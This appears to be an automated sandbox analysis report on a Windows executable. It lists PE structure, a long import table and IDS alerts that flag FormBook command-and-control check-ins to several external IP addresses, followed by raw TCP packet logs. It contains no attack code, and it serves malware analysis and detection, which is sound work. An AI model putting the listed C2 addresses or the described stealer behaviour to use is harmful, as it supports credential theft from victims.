                                                        bt esi, 03h

                                                        Rich Headers

                                                        Programming Language:
                                                        • [ASM] VS2013 build 21005
                                                        • [ C ] VS2013 build 21005
                                                        • [C++] VS2013 build 21005
                                                        • [ C ] VS2008 SP1 build 30729
                                                        • [IMP] VS2008 SP1 build 30729
                                                        • [ASM] VS2013 UPD5 build 40629
                                                        • [RES] VS2013 build 21005
                                                        • [LNK] VS2013 UPD5 build 40629

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x7ab3c.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1420000x7130.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x8dd2e0x8de00c2c2260508750422d20cd5cbb116b146False0.5729952505506608data6.675875439961112IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x8f0000x2e10e0x2e2004513b58651e3d8d87c81a396e5b2f1d1False0.3353340955284553OpenPGP Public Key5.760731648769018IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xbe0000x8f740x5200c2de4a3d214eae7e87c7bfc06bd79775False0.1017530487804878data1.1988106744719143IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0xc70000x7ab3c0x7ac00b55abbe6eba0239262d4a69ef316a5e5False0.721192400712831data7.406803163579947IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x1420000x71300x72001254908a9a03d2bcf12045d49cd572b9False0.7703536184210527data6.782377328042204IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0xc74a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                        RT_ICON0xc75c80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishGreat Britain0.12599077250680232
                                                        RT_ICON0xd7df00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishGreat Britain0.19891738490645364
                                                        RT_ICON0xe12980x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishGreat Britain0.22195009242144179
                                                        RT_ICON0xe67200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishGreat Britain0.18451818611242324
                                                        RT_ICON0xea9480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.26130705394190873
                                                        RT_ICON0xecef00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.26641651031894936
                                                        RT_ICON0xedf980x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishGreat Britain0.38688524590163936
                                                        RT_ICON0xee9200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.43439716312056736
                                                        RT_STRING0xeed880x594dataEnglishGreat Britain0.3333333333333333
                                                        RT_STRING0xef31c0x68adataEnglishGreat Britain0.2747909199522103
                                                        RT_STRING0xef9a80x490dataEnglishGreat Britain0.3715753424657534
                                                        RT_STRING0xefe380x5fcdataEnglishGreat Britain0.3087467362924282
                                                        RT_STRING0xf04340x65cdataEnglishGreat Britain0.34336609336609336
                                                        RT_STRING0xf0a900x466dataEnglishGreat Britain0.3605683836589698
                                                        RT_STRING0xf0ef80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                        RT_RCDATA0xf10500x50591data1.0003372783762021
                                                        RT_GROUP_ICON0x1415e40x76dataEnglishGreat Britain0.7627118644067796
                                                        RT_GROUP_ICON0x14165c0x14dataEnglishGreat Britain1.15
                                                        RT_VERSION0x1416700xdcdataEnglishGreat Britain0.6181818181818182
                                                        RT_MANIFEST0x14174c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                        Imports

                                                        DLLImport
                                                        WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                        VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                        COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                        MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                        WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                        PSAPI.DLLGetProcessMemoryInfo
                                                        IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                        USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                        UxTheme.dllIsThemeActive
                                                        KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                        USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                        GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                        COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                        ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                        SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                        ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                        OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                        Possible Origin

                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishGreat Britain

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-11-07T15:49:40.688943+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.1049764TCP
                                                        2024-11-07T15:50:19.138094+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.1049972TCP
                                                        2024-11-07T15:50:22.133740+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.10499733.33.130.19080TCP
                                                        2024-11-07T15:50:38.685584+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049974192.64.118.22180TCP
                                                        2024-11-07T15:50:41.368303+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049975192.64.118.22180TCP
                                                        2024-11-07T15:50:43.915878+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049976192.64.118.22180TCP
                                                        2024-11-07T15:50:46.527094+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049977192.64.118.22180TCP
                                                        2024-11-07T15:50:53.605281+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049978195.154.200.1580TCP
                                                        2024-11-07T15:50:56.152178+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049979195.154.200.1580TCP
                                                        2024-11-07T15:50:58.699230+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049980195.154.200.1580TCP
                                                        2024-11-07T15:51:01.318763+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049981195.154.200.1580TCP
                                                        2024-11-07T15:51:08.087996+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049982168.76.221.25280TCP
                                                        2024-11-07T15:51:10.730228+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049983168.76.221.25280TCP
                                                        2024-11-07T15:51:13.264976+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049984168.76.221.25280TCP
                                                        2024-11-07T15:51:15.803730+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049985168.76.221.25280TCP
                                                        2024-11-07T15:51:22.206440+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049986150.95.254.1680TCP
                                                        2024-11-07T15:51:25.339847+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049987150.95.254.1680TCP
                                                        2024-11-07T15:51:27.862211+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049988150.95.254.1680TCP
                                                        2024-11-07T15:51:30.408170+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049989150.95.254.1680TCP
                                                        2024-11-07T15:51:36.985157+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049990188.114.96.380TCP
                                                        2024-11-07T15:51:39.476121+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049991188.114.96.380TCP
                                                        2024-11-07T15:51:42.025674+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049992188.114.96.380TCP
                                                        2024-11-07T15:51:44.728604+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049993188.114.96.380TCP
                                                        2024-11-07T15:51:51.011005+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049994103.249.106.9180TCP
                                                        2024-11-07T15:51:53.901727+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049995103.249.106.9180TCP
                                                        2024-11-07T15:51:55.979857+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049996103.249.106.9180TCP
                                                        2024-11-07T15:51:58.510867+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049997103.249.106.9180TCP
                                                        2024-11-07T15:52:04.770948+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049998172.67.202.1080TCP
                                                        2024-11-07T15:52:07.365670+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049999172.67.202.1080TCP
                                                        2024-11-07T15:52:09.870607+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050000172.67.202.1080TCP
                                                        2024-11-07T15:52:12.410015+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1050001172.67.202.1080TCP
                                                        2024-11-07T15:52:19.727445+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050002156.234.28.9480TCP
                                                        2024-11-07T15:52:22.121733+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050003156.234.28.9480TCP
                                                        2024-11-07T15:52:24.713799+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050004156.234.28.9480TCP
                                                        2024-11-07T15:52:27.157159+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1050005156.234.28.9480TCP

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 7, 2024 15:50:20.257916927 CET4997380192.168.2.103.33.130.190
                                                        Nov 7, 2024 15:50:20.262881994 CET80499733.33.130.190192.168.2.10
                                                        Nov 7, 2024 15:50:20.266227007 CET4997380192.168.2.103.33.130.190
                                                        Nov 7, 2024 15:50:20.273966074 CET4997380192.168.2.103.33.130.190
                                                        Nov 7, 2024 15:50:20.278892994 CET80499733.33.130.190192.168.2.10
                                                        Nov 7, 2024 15:50:22.133512974 CET80499733.33.130.190192.168.2.10
                                                        Nov 7, 2024 15:50:22.133532047 CET80499733.33.130.190192.168.2.10
                                                        Nov 7, 2024 15:50:22.133549929 CET80499733.33.130.190192.168.2.10
                                                        Nov 7, 2024 15:50:22.133559942 CET80499733.33.130.190192.168.2.10
                                                        Nov 7, 2024 15:50:22.133739948 CET4997380192.168.2.103.33.130.190
                                                        Nov 7, 2024 15:50:22.133758068 CET4997380192.168.2.103.33.130.190
                                                        Nov 7, 2024 15:50:22.133764029 CET4997380192.168.2.103.33.130.190
                                                        Nov 7, 2024 15:50:22.137053013 CET4997380192.168.2.103.33.130.190
                                                        Nov 7, 2024 15:50:22.142782927 CET80499733.33.130.190192.168.2.10
                                                        Nov 7, 2024 15:50:37.939475060 CET4997480192.168.2.10192.64.118.221
                                                        Nov 7, 2024 15:50:37.944628954 CET8049974192.64.118.221192.168.2.10
                                                        Nov 7, 2024 15:50:37.946710110 CET4997480192.168.2.10192.64.118.221
                                                        Nov 7, 2024 15:50:37.962073088 CET4997480192.168.2.10192.64.118.221
                                                        Nov 7, 2024 15:50:37.967148066 CET8049974192.64.118.221192.168.2.10
                                                        Nov 7, 2024 15:50:38.646874905 CET8049974192.64.118.221192.168.2.10
                                                        Nov 7, 2024 15:50:38.685492039 CET8049974192.64.118.221192.168.2.10
                                                        Nov 7, 2024 15:50:38.685584068 CET4997480192.168.2.10192.64.118.221
                                                        Nov 7, 2024 15:50:39.464828968 CET4997480192.168.2.10192.64.118.221
                                                        Nov 7, 2024 15:50:40.630637884 CET4997580192.168.2.10192.64.118.221
                                                        Nov 7, 2024 15:50:40.635796070 CET8049975192.64.118.221192.168.2.10
                                                        Nov 7, 2024 15:50:40.635915995 CET4997580192.168.2.10192.64.118.221
                                                        Nov 7, 2024 15:50:40.648349047 CET4997580192.168.2.10192.64.118.221
                                                        Nov 7, 2024 15:50:40.653310061 CET8049975192.64.118.221192.168.2.10
                                                        Nov 7, 2024 15:50:41.329152107 CET8049975192.64.118.221192.168.2.10
                                                        Nov 7, 2024 15:50:41.367614985 CET8049975192.64.118.221192.168.2.10
                                                        Nov 7, 2024 15:50:41.368303061 CET4997580192.168.2.10192.64.118.221
                                                        Nov 7, 2024 15:50:42.152442932 CET4997580192.168.2.10192.64.118.221
                                                        Nov 7, 2024 15:50:43.181077003 CET4997680192.168.2.10192.64.118.221
                                                        Nov 7, 2024 15:50:43.185976028 CET8049976192.64.118.221192.168.2.10
                                                        Nov 7, 2024 15:50:43.186072111 CET4997680192.168.2.10192.64.118.221
                                                        Nov 7, 2024 15:50:43.223819971 CET4997680192.168.2.10192.64.118.221
                                                        Nov 7, 2024 15:50:43.229000092 CET8049976192.64.118.221192.168.2.10
                                                        Nov 7, 2024 15:50:43.229800940 CET8049976192.64.118.221192.168.2.10
                                                        Nov 7, 2024 15:50:43.877651930 CET8049976192.64.118.221192.168.2.10
                                                        Nov 7, 2024 15:50:43.915818930 CET8049976192.64.118.221192.168.2.10
                                                        Nov 7, 2024 15:50:43.915878057 CET4997680192.168.2.10192.64.118.221
                                                        Nov 7, 2024 15:50:44.730390072 CET4997680192.168.2.10192.64.118.221
                                                        Nov 7, 2024 15:50:45.785388947 CET4997780192.168.2.10192.64.118.221
                                                        Nov 7, 2024 15:50:45.790615082 CET8049977192.64.118.221192.168.2.10
                                                        Nov 7, 2024 15:50:45.790725946 CET4997780192.168.2.10192.64.118.221
                                                        Nov 7, 2024 15:50:45.798866987 CET4997780192.168.2.10192.64.118.221
                                                        Nov 7, 2024 15:50:45.803817034 CET8049977192.64.118.221192.168.2.10
                                                        Nov 7, 2024 15:50:46.482928991 CET8049977192.64.118.221192.168.2.10
                                                        Nov 7, 2024 15:50:46.527093887 CET4997780192.168.2.10192.64.118.221
                                                        Nov 7, 2024 15:50:46.556587934 CET8049977192.64.118.221192.168.2.10
                                                        Nov 7, 2024 15:50:46.556729078 CET4997780192.168.2.10192.64.118.221
                                                        Nov 7, 2024 15:50:46.559767962 CET4997780192.168.2.10192.64.118.221
                                                        Nov 7, 2024 15:50:46.564814091 CET8049977192.64.118.221192.168.2.10
                                                        Nov 7, 2024 15:50:52.073261023 CET4997880192.168.2.10195.154.200.15
                                                        Nov 7, 2024 15:50:52.079869986 CET8049978195.154.200.15192.168.2.10
                                                        Nov 7, 2024 15:50:52.080003023 CET4997880192.168.2.10195.154.200.15
                                                        Nov 7, 2024 15:50:52.097975016 CET4997880192.168.2.10195.154.200.15
                                                        Nov 7, 2024 15:50:52.104789019 CET8049978195.154.200.15192.168.2.10
                                                        Nov 7, 2024 15:50:53.605281115 CET4997880192.168.2.10195.154.200.15
                                                        Nov 7, 2024 15:50:53.610752106 CET8049978195.154.200.15192.168.2.10
                                                        Nov 7, 2024 15:50:53.610822916 CET4997880192.168.2.10195.154.200.15
                                                        Nov 7, 2024 15:50:54.623971939 CET4997980192.168.2.10195.154.200.15
                                                        Nov 7, 2024 15:50:54.632364988 CET8049979195.154.200.15192.168.2.10
                                                        Nov 7, 2024 15:50:54.632528067 CET4997980192.168.2.10195.154.200.15
                                                        Nov 7, 2024 15:50:54.643986940 CET4997980192.168.2.10195.154.200.15
                                                        Nov 7, 2024 15:50:54.652370930 CET8049979195.154.200.15192.168.2.10
                                                        Nov 7, 2024 15:50:56.152178049 CET4997980192.168.2.10195.154.200.15
                                                        Nov 7, 2024 15:50:56.158176899 CET8049979195.154.200.15192.168.2.10
                                                        Nov 7, 2024 15:50:56.158308029 CET4997980192.168.2.10195.154.200.15
                                                        Nov 7, 2024 15:50:57.171211004 CET4998080192.168.2.10195.154.200.15
                                                        Nov 7, 2024 15:50:57.176290035 CET8049980195.154.200.15192.168.2.10
                                                        Nov 7, 2024 15:50:57.176433086 CET4998080192.168.2.10195.154.200.15
                                                        Nov 7, 2024 15:50:57.188424110 CET4998080192.168.2.10195.154.200.15
                                                        Nov 7, 2024 15:50:57.193317890 CET8049980195.154.200.15192.168.2.10
                                                        Nov 7, 2024 15:50:57.193774939 CET8049980195.154.200.15192.168.2.10
                                                        Nov 7, 2024 15:50:58.699229956 CET4998080192.168.2.10195.154.200.15
                                                        Nov 7, 2024 15:50:58.704549074 CET8049980195.154.200.15192.168.2.10
                                                        Nov 7, 2024 15:50:58.704811096 CET4998080192.168.2.10195.154.200.15
                                                        Nov 7, 2024 15:50:59.718319893 CET4998180192.168.2.10195.154.200.15
                                                        Nov 7, 2024 15:50:59.723346949 CET8049981195.154.200.15192.168.2.10
                                                        Nov 7, 2024 15:50:59.723424911 CET4998180192.168.2.10195.154.200.15
                                                        Nov 7, 2024 15:50:59.730701923 CET4998180192.168.2.10195.154.200.15
                                                        Nov 7, 2024 15:50:59.735682964 CET8049981195.154.200.15192.168.2.10
                                                        Nov 7, 2024 15:51:01.318531990 CET8049981195.154.200.15192.168.2.10
                                                        Nov 7, 2024 15:51:01.318639040 CET8049981195.154.200.15192.168.2.10
                                                        Nov 7, 2024 15:51:01.318763018 CET4998180192.168.2.10195.154.200.15
                                                        Nov 7, 2024 15:51:01.426367044 CET8049981195.154.200.15192.168.2.10
                                                        Nov 7, 2024 15:51:01.426575899 CET4998180192.168.2.10195.154.200.15
                                                        Nov 7, 2024 15:51:01.429650068 CET4998180192.168.2.10195.154.200.15
                                                        Nov 7, 2024 15:51:01.434811115 CET8049981195.154.200.15192.168.2.10
                                                        Nov 7, 2024 15:51:06.923065901 CET4998280192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:06.928002119 CET8049982168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:06.928071976 CET4998280192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:06.939676046 CET4998280192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:06.944520950 CET8049982168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:08.087949038 CET8049982168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:08.087996006 CET4998280192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:08.448868036 CET4998280192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:08.453764915 CET8049982168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:09.559745073 CET4998380192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:09.564760923 CET8049983168.76.221.252192.168.2.10
                                                        Nov 7, 2024 15:51:09.564825058 CET4998380192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:09.582758904 CET4998380192.168.2.10168.76.221.252
                                                        Nov 7, 2024 15:51:09.588490009 CET8049983168.76.221.252192.168.2.10
